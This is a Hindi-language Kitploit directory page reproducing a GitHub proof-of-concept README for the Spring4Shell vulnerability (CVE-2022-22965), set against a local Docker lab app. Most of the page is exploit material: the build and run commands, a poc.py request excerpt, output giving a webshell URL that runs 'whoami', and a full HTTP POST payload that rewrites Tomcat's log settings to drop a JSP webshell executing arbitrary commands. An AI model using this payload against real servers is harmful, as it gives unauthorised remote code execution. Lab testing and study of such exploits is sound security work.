Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2022-22965 — Spring4Shell - CVE-2022-22965 | Kitploit
उपकरण/GitHubGitHub/twseptian/cve-2022-22965
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubtwseptian/cve-2022-22965

cve-2022-22965

Spring4Shell - CVE-2022-22965

रिपॉजिटरी देखें
24 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Spring4Shell - CVE-2022-22965

निर्माण

  • आइए रिपॉजिटरी को क्लोन करें, कंटेनर बनाएं और चलाएं
root@kitploit:~
$ git clone https://github.com/twseptian/cve-2022-22965.git
$ cd cve-2022-22965
$ docker build . -t spring4shell-poc
$ docker run -p 8080:8080 --name spring4shell-poc spring4shell-poc
  • ब्राउज़र का उपयोग करके पहुँच की जाँच करें http://172.17.0.2:8080/spring-form/greeting

docker run

PoC

  • हम poc.py पर प्रॉक्सी जोड़ते हैं।
root@kitploit:~
[SNIP]
proxies = {'http':'http://127.0.0.1:8081','https':'https://127.0.0.1:8081'} #proxy configuration
[SNIP]
...
[SNIP]
        try:
            requests.post(self.url,
                          headers=headers,
                          data=data,
                          timeout=15,
                          allow_redirects=False,
                          verify=False, proxies=proxies)
[SNIP]                          
  • निम्नलिखित कमांड से poc.py चलाएं।
root@kitploit:~
$ python3 poc.py --url http://172.17.0.2:8080/spring-form/greeting
Vulnerable,shell url: http://172.17.0.2:8080/tomcatwar.jsp?pwd=j&cmd=whoami

python poc

नोट: पायथन एक्सप्लॉइट के लिए Spring4Shell PoC Application को धन्यवाद

  • जब एक्सप्लॉइट एक शेल यूआरएल उत्पन्न करता है, हम बर्पसूट का उपयोग करके पोस्ट अनुरोध को इंटरसेप्ट कर सकते हैं
root@kitploit:~
POST /spring-form/greeting HTTP/1.1
Host: 172.17.0.2:8080
User-Agent: python-requests/2.23.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
suffix: %>//
c1: Runtime
c2: <%
DNT: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 762

class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=

नोट: आप स्वयं अनुरोध का विश्लेषण कर सकते हैं #lul

  • एक्सप्लॉइट शेल यूआरएल उत्पन्न करेगा। हम लक्ष्य से रिमोट कोड निष्पादन करने के लिए ब्राउज़र पर यूआरएल तक पहुँच सकते हैं।

shell url

shell url

संदर्भ

  • Spring4Shell PoC Application
  • Spring4Shell-POC (CVE-2022-22965)
टूल डाउनलोड करें